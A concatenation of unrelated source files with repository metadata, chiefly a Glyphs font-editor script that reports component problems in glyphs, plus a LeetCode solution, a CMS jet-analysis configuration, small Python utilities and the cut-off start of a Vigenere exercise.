self.w.nestedComponents.getNSButton().setToolTip_("Lists glyphs that contain components, which in turn contain components.")
linePos += lineHeight
self.w.orphanedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Orphaned components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.orphanedComponents.getNSButton().setToolTip_("Lists glyphs that contain components referencing glyphs that do not exist in the font (anymore).")
linePos += lineHeight
self.w.emptyComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Empty components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.emptyComponents.getNSButton().setToolTip_("Lists glyphs that contain components pointing to empty layers (layers without shapes).")
linePos += lineHeight
self.w.unalignedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Unaligned components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.unalignedComponents.getNSButton().setToolTip_("Lists glyphs that contain unaligned components.")
linePos += lineHeight
# Line Separator:
self.w.line_transformedComponents = vanilla.HorizontalLine((inset, linePos + 3, -inset, 1))
linePos += int(lineHeight / 2)
self.w.scaledComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Scaled components", value=True, callback=self.SavePreferences, sizeStyle='small')
self.w.scaledComponents.getNSButton().setToolTip_("Lists all components that are not at their original size. Useful for bug tracing in variable fonts.")
linePos += lineHeight
self.w.unproportionallyScaledComponents = vanilla.CheckBox(
(inset * 2, linePos - 1, -inset, 20), "Only unproportionally scaled (h≠v)", value=True, callback=self.SavePreferences, sizeStyle='small'
)
self.w.unproportionallyScaledComponents.getNSButton().setToolTip_(
"Lists glyphs that contain components that are not scaled the same horizontally and vertically. Useful for double checking in TT exports and variable fonts."
)
linePos += lineHeight
self.w.rotatedComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Rotated components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.rotatedComponents.getNSButton().setToolTip_(
"Lists all glyphs that contain rotated components, or components that are flipped BOTH horizontally and vertically. May be a good idea to check their alignment."
)
linePos += lineHeight
self.w.mirroredComponents = vanilla.CheckBox((inset, linePos - 1, -inset, 20), "Flipped components", value=False, callback=self.SavePreferences, sizeStyle='small')
self.w.mirroredComponents.getNSButton().setToolTip_("Lists all glyphs containing components that are mirrored EITHER horizontally or vertically.")
linePos += lineHeight
self.w.shiftedComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Shifted (but undistorted) components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.shiftedComponents.getNSButton().setToolTip_("Lists all glyphs containing unaligned components that are not positioned at x=0 y=0.")
linePos += lineHeight
# Line Separator:
self.w.line_cornerComponents = vanilla.HorizontalLine((inset, linePos + 3, -inset, 1))
linePos += int(lineHeight / 2)
self.w.detachedCornerComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Detached corner components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
self.w.detachedCornerComponents.getNSButton().setToolTip_("Lists all glyphs containing corner components that have lost their connection point.")
linePos += lineHeight
self.w.transformedCornerComponents = vanilla.CheckBox(
(inset, linePos - 1, -inset, 20), "Transformed corner components", value=False, callback=self.SavePreferences, sizeStyle='small'
)
		self.w.transformedCornerComponents.getNSButton().setToolTip_("Lists all glyphs containing corner components that are not at 100% scale.")
linePos += lineHeight
# Line Separator:
self.w.line_scriptOptions = vanilla.HorizontalLine((inset, linePos + 3, -inset, 1))
linePos += int(lineHeight / 2)
# Script Options:
self.w.includeAllGlyphs = vanilla.CheckBox(
(inset, linePos, -inset, 20), "Check all glyphs in font (recommended)", value=True, callback=self.SavePreferences, sizeStyle='small'
)
self.w.includeAllGlyphs.getNSButton().setToolTip_(
"If enabled, will ignore your current glyph selection, and simply go through the complete font. Recommended. May still ignore non-exporting glyph, see following option."
)
linePos += lineHeight
self.w.includeNonExporting = vanilla.CheckBox((inset, linePos, -inset, 20), "Include non-exporting glyphs", value=True, callback=self.SavePreferences, sizeStyle='small')
self.w.includeNonExporting.getNSButton().setToolTip_("If disabled, will ignore glyphs that are set to not export.")
linePos += lineHeight
self.w.reuseTab = vanilla.CheckBox((inset, linePos, 125, 20), "Reuse existing tab", value=True, callback=self.SavePreferences, sizeStyle='small')
self.w.reuseTab.getNSButton().setToolTip_("If enabled, will only open a new tab if none is open. Recommended.")
linePos += lineHeight
# Progress Bar and Status text:
self.w.progress = vanilla.ProgressBar((inset, linePos, -inset, 16))
self.w.progress.set(0) # set progress indicator to zero
self.w.status = vanilla.TextBox((inset, -18 - inset, -inset - 100, 14), "🤖 Ready.", sizeStyle='small', selectable=True)
linePos += lineHeight
# Run Button:
self.w.runButton = vanilla.Button((-100 - inset, -20 - inset, -inset, -inset), "Open Tab", sizeStyle='regular', callback=self.ComponentProblemFinderMain)
self.w.setDefaultButton(self.w.runButton)
# Load Settings:
if not self.LoadPreferences():
print("Note: 'Component Problem Finder' could not load preferences. Will resort to defaults")
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def domain(self, prefName):
prefName = prefName.strip().strip(".")
return self.prefID + "." + prefName.strip()
def pref(self, prefName):
prefDomain = self.domain(prefName)
return Glyphs.defaults[prefDomain]
def updateUI(self, sender=None):
shouldEnableRunButton = any([bool(Glyphs.defaults[self.domain(p)]) for p in self.prefs[:-3]])
self.w.runButton.enable(shouldEnableRunButton)
self.w.unproportionallyScaledComponents.enable(self.w.scaledComponents.get())
def SavePreferences(self, sender=None):
try:
# write current settings into prefs:
for prefName in self.prefs:
Glyphs.defaults[self.domain(prefName)] = getattr(self.w, prefName).get()
self.updateUI()
return True
except:
import traceback
print(traceback.format_exc())
return False
def LoadPreferences(self):
try:
for prefName in self.prefs:
# register defaults:
Glyphs.registerDefault(self.domain(prefName), prefName.startswith("include") or prefName.startswith("reuse"))
# load previously written prefs:
getattr(self.w, prefName).set(self.pref(prefName))
self.updateUI()
return True
except:
import traceback
print(traceback.format_exc())
return False
def callMethodWithArg(self, methodName, arg):
method = getattr(self, methodName)
return method(arg)
def glyphHas_composablesWithoutComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
if (thisLayer.isMasterLayer or thisLayer.isSpecialLayer) and not thisLayer.components:
info = thisGlyph.glyphInfo
if info and info.components:
print("\t🙅🏼 missing components %s on layer: %s" % (
", ".join([i.name for i in info.components]),
thisLayer.name,
))
return True
return False
def glyphHas_unusualComponents(self, thisGlyph):
componentStructure = orthodoxComponentsForGlyph(thisGlyph)
if componentStructure:
for thisLayer in thisGlyph.layers:
if not layerAdheresToStructure(thisLayer, componentStructure):
print("\t🔒 unusual components %s on layer: %s" % (
", ".join([c.name for c in thisLayer.components]),
thisLayer.name,
))
return True
return False
def glyphHas_lockedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
if thisComponent.locked:
print("\t🔒 locked component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_nestedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
originalLayer = thisComponent.componentLayer
if originalLayer and originalLayer.components:
print("\t🪆 nested component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_orphanedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
theseComponents = thisLayer.components
if theseComponents:
for thisComponent in theseComponents:
if thisComponent.component is None:
print("\t🫥 orphaned component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_emptyComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
theseComponents = thisLayer.components
if theseComponents:
for thisComponent in theseComponents:
if not thisComponent.componentLayer.shapes:
print("\t🫙 empty component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_unalignedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
theseComponents = thisLayer.components
if theseComponents:
for thisComponent in theseComponents:
if thisComponent.alignment == -1:
print("\t🤪 unaligned component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_scaledComponents(self, thisGlyph, unproportional=False):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
if thisComponent.rotation == 0.0:
hScale, vScale = thisComponent.scale
scaled = (hScale * vScale > 0.0) and (abs(hScale) != 1.0 or abs(vScale) != 1.0)
if scaled:
if unproportional:
unproportionallyScaled = abs(hScale) != abs(vScale)
if unproportionallyScaled:
print("\t🤪 unproportionally scaled component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
else:
print("\t📏 scaled component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_unproportionallyScaledComponents(self, thisGlyph):
return self.glyphHas_scaledComponents(thisGlyph, unproportional=True)
def glyphHas_rotatedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
hScale, vScale = thisComponent.scale
rotatedByScaling = hScale == vScale and hScale < 0 and vScale < 0
if thisComponent.rotation or rotatedByScaling:
print("\t🎡 rotated component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_mirroredComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
hScale, vScale = thisComponent.scale
if hScale * vScale < 0:
print("\t🪞 mirrored component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_shiftedComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisComponent in thisLayer.components:
hScale, vScale = thisComponent.scale
degrees = thisComponent.rotation
if hScale == 1.0 and vScale == 1.0 and degrees == 0.0:
x, y = thisComponent.position
if x != 0 or y != 0:
print("\t🏗 shifted component %s on layer: %s" % (thisComponent.componentName, thisLayer.name))
return True
return False
def glyphHas_detachedCornerComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for h in thisLayer.hints:
if h.type == CORNER:
if not h.originNode:
print("\t🚨 detached corner component %s on layer: %s" % (h.name, thisLayer.name))
return True
return False
def glyphHas_transformedCornerComponents(self, thisGlyph):
for thisLayer in thisGlyph.layers:
for thisHint in thisLayer.hints:
if thisHint.type == CORNER:
if abs(thisHint.scale.x) != 1.0 or abs(thisHint.scale.y) != 1.0:
thisLayer.selection = None
thisHint.selected = True
print("\t🦄 transformed corner component %s on layer: %s" % (thisHint.name, thisLayer.name))
return True
return False
def ComponentProblemFinderMain(self, sender=None):
try:
# clear macro window log:
Glyphs.clearLog()
# start taking time:
start = timer()
# update settings to the latest user input:
if not self.SavePreferences():
print("Note: 'Component Problem Finder' could not write preferences.")
thisFont = Glyphs.font # frontmost font
if thisFont is None:
Message(title="No Font Open", message="The script requires a font. Open a font and run the script again.", OKButton=None)
else:
print("Component Problem Finder Report for %s" % thisFont.familyName)
if thisFont.filepath:
print(thisFont.filepath)
else:
print("⚠️ The font file has not been saved yet.")
print()
if self.pref("includeAllGlyphs"):
glyphs = thisFont.glyphs
else:
glyphs = [l.parent for l in thisFont.selectedLayers]
enabledPrefNames = [p for p in self.prefs[:-3] if self.pref(p)]
glyphDict = {}
for dictKey in enabledPrefNames:
glyphDict[dictKey] = []
shouldIncludeNonExporting = self.pref("includeNonExporting")
glyphCount = len(glyphs)
for i, thisGlyph in enumerate(glyphs):
self.w.progress.set(100 * i / glyphCount)
report = "🔠 %s" % thisGlyph.name
print(report)
self.w.status.set(report)
if shouldIncludeNonExporting or thisGlyph.export:
for prefName in enabledPrefNames:
if Glyphs.defaults[self.domain(prefName)]:
methodName = "glyphHas_%s" % prefName
isAffected = self.callMethodWithArg(methodName, thisGlyph)
if isAffected:
glyphDict[prefName].append(thisGlyph.name)
report = ""
for prefName in enabledPrefNames:
affectedGlyphs = glyphDict[prefName]
if affectedGlyphs:
report += "\n%s:\n%s\n" % (
" ".join(camelCaseSplit(prefName)).capitalize(),
"/" + "/".join(affectedGlyphs),
)
print(report)
if self.pref("reuseTab") and thisFont.currentTab:
newTab = thisFont.currentTab
else:
newTab = thisFont.newTab()
newTab.text = report.strip()
# take time:
end = timer()
timereport = reportTimeInNaturalLanguage(end - start)
print("Time elapsed: %s" % timereport)
self.w.status.set("✅ Done. %s." % timereport)
self.w.progress.set(100)
# Final report:
Glyphs.showNotification(
"%s: Done" % (thisFont.familyName),
"Component Problem Finder is finished. Details in Macro Window",
)
print("\nDone.")
except Exception as e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print("Component Problem Finder Error: %s" % e)
import traceback
print(traceback.format_exc())
ComponentProblemFinder()
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
4d9725de9f5d6415c6a02d66311fb489c305c554
|
a81a1efe1a93d5af0ef3f6403862a1544befd6cf
|
/HashTable/387_FirstUniqueCharacterInAString.py
|
b2a92fa927e8f971aa0b15b6b3070f9234e20fc0
|
[] |
no_license
|
fishleongxhh/LeetCode
|
89da4ae3ca1715b1909c350437c0ba79eb2a8349
|
d0352fecc61396fc460e1350572189b175a13f61
|
refs/heads/master
| 2020-04-05T17:14:27.976946
| 2018-12-16T14:10:54
| 2018-12-16T14:10:54
| 157,050,997
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# -*- coding: utf-8 -*-
# Author: Xu Hanhui
# This program solves LeetCode 387: First Unique Character in a String
def firstUniqChar(s):
dic = {}
uniq_str = set()
for loc, item in enumerate(s):
if item in dic:
uniq_str.discard(item)
else:
dic[item] = loc
uniq_str.add(item)
res = [dic[item] for item in uniq_str]
if res:
return min(res)
return -1
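# An equivalent two-pass variant (sketch, not part of the original solution):
# count all characters first, then return the first index whose character
# occurs exactly once.
# from collections import Counter
# def firstUniqCharTwoPass(s):
#     counts = Counter(s)
#     for i, ch in enumerate(s):
#         if counts[ch] == 1:
#             return i
#     return -1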
if __name__ == "__main__":
s = 'huhuihui'
print(s)
print(firstUniqChar(s))
|
[
"xhh1120132805@163.com"
] |
xhh1120132805@163.com
|
1c6dff9a338a0153cfabc16870bab5f9d1330b5b
|
f31fda8014ecadf6af7d4e3392fb917c49e0352a
|
/HeavyIonsAnalysis/JetAnalysis/python/jets/akFilter2PFJetSequence_PbPb_data_cff.py
|
1a674d6fbc2a55e627708930cc51a3f29f18138e
|
[] |
no_license
|
jniedzie/lightbylight
|
acea5051f053c49824a49a0b78bac3a2247ee75f
|
f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8
|
refs/heads/master
| 2020-03-18T12:24:31.970468
| 2018-02-09T15:50:00
| 2018-02-09T15:50:00
| 134,724,759
| 0
| 1
| null | 2018-05-24T14:11:12
| 2018-05-24T14:11:12
| null |
UTF-8
|
Python
| false
| false
| 14,619
|
py
|
import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.patHeavyIonSequences_cff import patJetGenJetMatch, patJetPartonMatch, patJetCorrFactors, patJets
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
from HeavyIonsAnalysis.JetAnalysis.bTaggers_cff import *
from RecoJets.JetProducers.JetIDParams_cfi import *
from RecoJets.JetProducers.nJettinessAdder_cfi import Njettiness
akFilter2PFmatch = patJetGenJetMatch.clone(
src = cms.InputTag("akFilter2PFJets"),
matched = cms.InputTag("ak2HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.2
)
akFilter2PFmatchGroomed = patJetGenJetMatch.clone(
src = cms.InputTag("akFilter2HiGenJets"),
matched = cms.InputTag("ak2HiSignalGenJets"),
resolveByMatchQuality = cms.bool(False),
maxDeltaR = 0.2
)
akFilter2PFparton = patJetPartonMatch.clone(src = cms.InputTag("akFilter2PFJets")
)
akFilter2PFcorr = patJetCorrFactors.clone(
useNPV = cms.bool(False),
useRho = cms.bool(False),
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akFilter2PFJets"),
payload = "AK2PF_offline"
)
akFilter2PFJetID= cms.EDProducer('JetIDProducer', JetIDParams, src = cms.InputTag('akFilter2CaloJets'))
#akFilter2PFclean = heavyIonCleanedGenJets.clone(src = cms.InputTag('ak2HiSignalGenJets'))
akFilter2PFbTagger = bTaggers("akFilter2PF",0.2)
#create objects locally since they don't load properly otherwise
#akFilter2PFmatch = akFilter2PFbTagger.match
akFilter2PFparton = patJetPartonMatch.clone(src = cms.InputTag("akFilter2PFJets"), matched = cms.InputTag("hiSignalGenParticles"))
akFilter2PFPatJetFlavourAssociationLegacy = akFilter2PFbTagger.PatJetFlavourAssociationLegacy
akFilter2PFPatJetPartons = akFilter2PFbTagger.PatJetPartons
akFilter2PFJetTracksAssociatorAtVertex = akFilter2PFbTagger.JetTracksAssociatorAtVertex
akFilter2PFJetTracksAssociatorAtVertex.tracks = cms.InputTag("highPurityTracks")
akFilter2PFSimpleSecondaryVertexHighEffBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akFilter2PFSimpleSecondaryVertexHighPurBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akFilter2PFCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.CombinedSecondaryVertexBJetTags
akFilter2PFCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.CombinedSecondaryVertexV2BJetTags
akFilter2PFJetBProbabilityBJetTags = akFilter2PFbTagger.JetBProbabilityBJetTags
akFilter2PFSoftPFMuonByPtBJetTags = akFilter2PFbTagger.SoftPFMuonByPtBJetTags
akFilter2PFSoftPFMuonByIP3dBJetTags = akFilter2PFbTagger.SoftPFMuonByIP3dBJetTags
akFilter2PFTrackCountingHighEffBJetTags = akFilter2PFbTagger.TrackCountingHighEffBJetTags
akFilter2PFTrackCountingHighPurBJetTags = akFilter2PFbTagger.TrackCountingHighPurBJetTags
akFilter2PFPatJetPartonAssociationLegacy = akFilter2PFbTagger.PatJetPartonAssociationLegacy
akFilter2PFImpactParameterTagInfos = akFilter2PFbTagger.ImpactParameterTagInfos
akFilter2PFImpactParameterTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akFilter2PFJetProbabilityBJetTags = akFilter2PFbTagger.JetProbabilityBJetTags
akFilter2PFSecondaryVertexTagInfos = akFilter2PFbTagger.SecondaryVertexTagInfos
akFilter2PFSimpleSecondaryVertexHighEffBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighEffBJetTags
akFilter2PFSimpleSecondaryVertexHighPurBJetTags = akFilter2PFbTagger.SimpleSecondaryVertexHighPurBJetTags
akFilter2PFCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.CombinedSecondaryVertexBJetTags
akFilter2PFCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.CombinedSecondaryVertexV2BJetTags
akFilter2PFSecondaryVertexNegativeTagInfos = akFilter2PFbTagger.SecondaryVertexNegativeTagInfos
akFilter2PFNegativeSimpleSecondaryVertexHighEffBJetTags = akFilter2PFbTagger.NegativeSimpleSecondaryVertexHighEffBJetTags
akFilter2PFNegativeSimpleSecondaryVertexHighPurBJetTags = akFilter2PFbTagger.NegativeSimpleSecondaryVertexHighPurBJetTags
akFilter2PFNegativeCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.NegativeCombinedSecondaryVertexBJetTags
akFilter2PFPositiveCombinedSecondaryVertexBJetTags = akFilter2PFbTagger.PositiveCombinedSecondaryVertexBJetTags
akFilter2PFNegativeCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.NegativeCombinedSecondaryVertexV2BJetTags
akFilter2PFPositiveCombinedSecondaryVertexV2BJetTags = akFilter2PFbTagger.PositiveCombinedSecondaryVertexV2BJetTags
akFilter2PFSoftPFMuonsTagInfos = akFilter2PFbTagger.SoftPFMuonsTagInfos
akFilter2PFSoftPFMuonsTagInfos.primaryVertex = cms.InputTag("offlinePrimaryVertices")
akFilter2PFSoftPFMuonBJetTags = akFilter2PFbTagger.SoftPFMuonBJetTags
akFilter2PFSoftPFMuonByIP3dBJetTags = akFilter2PFbTagger.SoftPFMuonByIP3dBJetTags
akFilter2PFSoftPFMuonByPtBJetTags = akFilter2PFbTagger.SoftPFMuonByPtBJetTags
akFilter2PFNegativeSoftPFMuonByPtBJetTags = akFilter2PFbTagger.NegativeSoftPFMuonByPtBJetTags
akFilter2PFPositiveSoftPFMuonByPtBJetTags = akFilter2PFbTagger.PositiveSoftPFMuonByPtBJetTags
akFilter2PFPatJetFlavourIdLegacy = cms.Sequence(akFilter2PFPatJetPartonAssociationLegacy*akFilter2PFPatJetFlavourAssociationLegacy)
#Not working with our PU sub, but keep it here for reference
#akFilter2PFPatJetFlavourAssociation = akFilter2PFbTagger.PatJetFlavourAssociation
#akFilter2PFPatJetFlavourId = cms.Sequence(akFilter2PFPatJetPartons*akFilter2PFPatJetFlavourAssociation)
akFilter2PFJetBtaggingIP = cms.Sequence(akFilter2PFImpactParameterTagInfos *
(akFilter2PFTrackCountingHighEffBJetTags +
akFilter2PFTrackCountingHighPurBJetTags +
akFilter2PFJetProbabilityBJetTags +
akFilter2PFJetBProbabilityBJetTags
)
)
akFilter2PFJetBtaggingSV = cms.Sequence(akFilter2PFImpactParameterTagInfos
*
akFilter2PFSecondaryVertexTagInfos
* (akFilter2PFSimpleSecondaryVertexHighEffBJetTags+
akFilter2PFSimpleSecondaryVertexHighPurBJetTags+
akFilter2PFCombinedSecondaryVertexBJetTags+
akFilter2PFCombinedSecondaryVertexV2BJetTags
)
)
akFilter2PFJetBtaggingNegSV = cms.Sequence(akFilter2PFImpactParameterTagInfos
*
akFilter2PFSecondaryVertexNegativeTagInfos
* (akFilter2PFNegativeSimpleSecondaryVertexHighEffBJetTags+
akFilter2PFNegativeSimpleSecondaryVertexHighPurBJetTags+
akFilter2PFNegativeCombinedSecondaryVertexBJetTags+
akFilter2PFPositiveCombinedSecondaryVertexBJetTags+
akFilter2PFNegativeCombinedSecondaryVertexV2BJetTags+
akFilter2PFPositiveCombinedSecondaryVertexV2BJetTags
)
)
akFilter2PFJetBtaggingMu = cms.Sequence(akFilter2PFSoftPFMuonsTagInfos * (akFilter2PFSoftPFMuonBJetTags
+
akFilter2PFSoftPFMuonByIP3dBJetTags
+
akFilter2PFSoftPFMuonByPtBJetTags
+
akFilter2PFNegativeSoftPFMuonByPtBJetTags
+
akFilter2PFPositiveSoftPFMuonByPtBJetTags
)
)
akFilter2PFJetBtagging = cms.Sequence(akFilter2PFJetBtaggingIP
*akFilter2PFJetBtaggingSV
*akFilter2PFJetBtaggingNegSV
# *akFilter2PFJetBtaggingMu
)
akFilter2PFpatJetsWithBtagging = patJets.clone(jetSource = cms.InputTag("akFilter2PFJets"),
genJetMatch = cms.InputTag("akFilter2PFmatch"),
genPartonMatch = cms.InputTag("akFilter2PFparton"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akFilter2PFcorr")),
JetPartonMapSource = cms.InputTag("akFilter2PFPatJetFlavourAssociationLegacy"),
JetFlavourInfoSource = cms.InputTag("akFilter2PFPatJetFlavourAssociation"),
trackAssociationSource = cms.InputTag("akFilter2PFJetTracksAssociatorAtVertex"),
useLegacyJetMCFlavour = True,
discriminatorSources = cms.VInputTag(cms.InputTag("akFilter2PFSimpleSecondaryVertexHighEffBJetTags"),
cms.InputTag("akFilter2PFSimpleSecondaryVertexHighPurBJetTags"),
cms.InputTag("akFilter2PFCombinedSecondaryVertexBJetTags"),
cms.InputTag("akFilter2PFCombinedSecondaryVertexV2BJetTags"),
cms.InputTag("akFilter2PFJetBProbabilityBJetTags"),
cms.InputTag("akFilter2PFJetProbabilityBJetTags"),
#cms.InputTag("akFilter2PFSoftPFMuonByPtBJetTags"),
#cms.InputTag("akFilter2PFSoftPFMuonByIP3dBJetTags"),
cms.InputTag("akFilter2PFTrackCountingHighEffBJetTags"),
cms.InputTag("akFilter2PFTrackCountingHighPurBJetTags"),
),
jetIDMap = cms.InputTag("akFilter2PFJetID"),
addBTagInfo = True,
addTagInfos = True,
addDiscriminators = True,
addAssociatedTracks = True,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = False,
addGenJetMatch = False,
embedGenJetMatch = False,
embedGenPartonMatch = False,
# embedCaloTowers = False,
# embedPFCandidates = True
)
akFilter2PFNjettiness = Njettiness.clone(
src = cms.InputTag("akFilter2PFJets"),
R0 = cms.double( 0.2)
)
akFilter2PFpatJetsWithBtagging.userData.userFloats.src += ['akFilter2PFNjettiness:tau1','akFilter2PFNjettiness:tau2','akFilter2PFNjettiness:tau3']
akFilter2PFJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akFilter2PFpatJetsWithBtagging"),
genjetTag = 'ak2HiGenJets',
rParam = 0.2,
matchJets = cms.untracked.bool(False),
matchTag = 'patJetsWithBtagging',
pfCandidateLabel = cms.untracked.InputTag('particleFlowTmp'),
trackTag = cms.InputTag("hiGeneralTracks"),
fillGenJets = False,
isMC = False,
doSubEvent = False,
useHepMC = cms.untracked.bool(False),
genParticles = cms.untracked.InputTag("genParticles"),
eventInfoTag = cms.InputTag("generator"),
doLifeTimeTagging = cms.untracked.bool(True),
doLifeTimeTaggingExtras = cms.untracked.bool(False),
bTagJetName = cms.untracked.string("akFilter2PF"),
jetName = cms.untracked.string("akFilter2PF"),
genPtMin = cms.untracked.double(5),
hltTrgResults = cms.untracked.string('TriggerResults::'+'HISIGNAL'),
doTower = cms.untracked.bool(True),
doSubJets = cms.untracked.bool(True),
doGenSubJets = cms.untracked.bool(False),
subjetGenTag = cms.untracked.InputTag("akFilter2GenJets"),
doGenTaus = False
)
akFilter2PFJetSequence_mc = cms.Sequence(
#akFilter2PFclean
#*
akFilter2PFmatch
#*
#akFilter2PFmatchGroomed
*
akFilter2PFparton
*
akFilter2PFcorr
*
#akFilter2PFJetID
#*
akFilter2PFPatJetFlavourIdLegacy
#*
#akFilter2PFPatJetFlavourId # Use legacy algo till PU implemented
*
akFilter2PFJetTracksAssociatorAtVertex
*
akFilter2PFJetBtagging
*
akFilter2PFNjettiness
*
akFilter2PFpatJetsWithBtagging
*
akFilter2PFJetAnalyzer
)
akFilter2PFJetSequence_data = cms.Sequence(akFilter2PFcorr
*
#akFilter2PFJetID
#*
akFilter2PFJetTracksAssociatorAtVertex
*
akFilter2PFJetBtagging
*
akFilter2PFNjettiness
*
akFilter2PFpatJetsWithBtagging
*
akFilter2PFJetAnalyzer
)
akFilter2PFJetSequence_jec = cms.Sequence(akFilter2PFJetSequence_mc)
akFilter2PFJetSequence_mb = cms.Sequence(akFilter2PFJetSequence_mc)
akFilter2PFJetSequence = cms.Sequence(akFilter2PFJetSequence_data)
|
[
"rchudasa@cern.ch"
] |
rchudasa@cern.ch
|
148ee2aa423bec48565132b2a7ea8db0853d712d
|
be6b8e5f65ab1e86e72d4a70a6bcfe0891458df1
|
/sigfig.py
|
3bdf3596edba9f1336625991197baeb64b8616c7
|
[] |
no_license
|
annayqho/papers
|
c406185485ef447b4aebf0d37011e79ef4f872fb
|
527bab334f118e77eeb028ed1a787be3b887724c
|
refs/heads/master
| 2021-07-10T05:18:47.134685
| 2017-10-12T02:38:32
| 2017-10-12T02:38:32
| 100,283,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 499
|
py
|
import numpy as np
from math import log10, floor
def round_sig(x, sig=2):
if x == 0:
return 0
elif x < 0:
return -round(-x, sig-int(floor(log10(-x)))-1)
return round(x, sig-int(floor(log10(x)))-1)
def ndec(num):
dec = str(num).split('.')[-1]
return len(dec)
def format_val(val, sig):
valrd = round_sig(val, 2)
sigrd = np.round(sig, ndec(valrd))
val_str = str(valrd) + "$\pm$" + str(sigrd)
if val < 0:
val_str = ""
return val_str
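# Worked example (illustration only, not in the original module):
# round_sig(0.012345) -> 0.012; ndec(0.012) -> 3; np.round(0.0021, 3) -> 0.002
# so format_val(0.012345, 0.0021) -> '0.012$\pm$0.002'
# (note that format_val returns '' for negative values by design)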
|
[
"annayqho@gmail.com"
] |
annayqho@gmail.com
|
96a9a0075629c44cfce0d3f9471369f36b35ffd9
|
238e46a903cf7fac4f83fa8681094bf3c417d22d
|
/VTK/vtk_7.1.1_x64_Release/lib/python2.7/site-packages/twisted/pair/_version.py
|
6203753e169cead8711dc820254d774becccc3be
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
baojunli/FastCAE
|
da1277f90e584084d461590a3699b941d8c4030b
|
a3f99f6402da564df87fcef30674ce5f44379962
|
refs/heads/master
| 2023-02-25T20:25:31.815729
| 2021-02-01T03:17:33
| 2021-02-01T03:17:33
| 268,390,180
| 1
| 0
|
BSD-3-Clause
| 2020-06-01T00:39:31
| 2020-06-01T00:39:31
| null |
UTF-8
|
Python
| false
| false
| 271
|
py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
# This is an auto-generated file. Do not edit it.
"""
Provides Twisted version information.
"""
from twisted.python import versions
version = versions.Version('twisted.pair', 14, 0, 0)
|
[
"l”ibaojunqd@foxmail.com“"
] |
l”ibaojunqd@foxmail.com“
|
ad05a82658610e10819bc5ab5fb7c68d5f100362
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/raw_scripts/132.230.102.123-10.21.12.20/1569576510.py
|
641aacf6e240b35309990accd5d2be629609eef6
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352
| 2020-03-26T10:22:35
| 2020-03-26T10:22:35
| 236,498,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,019
|
py
|
import functools
import typing
import string
import random
import pytest
## Solution, parts 1 and 2
class Vigenere:
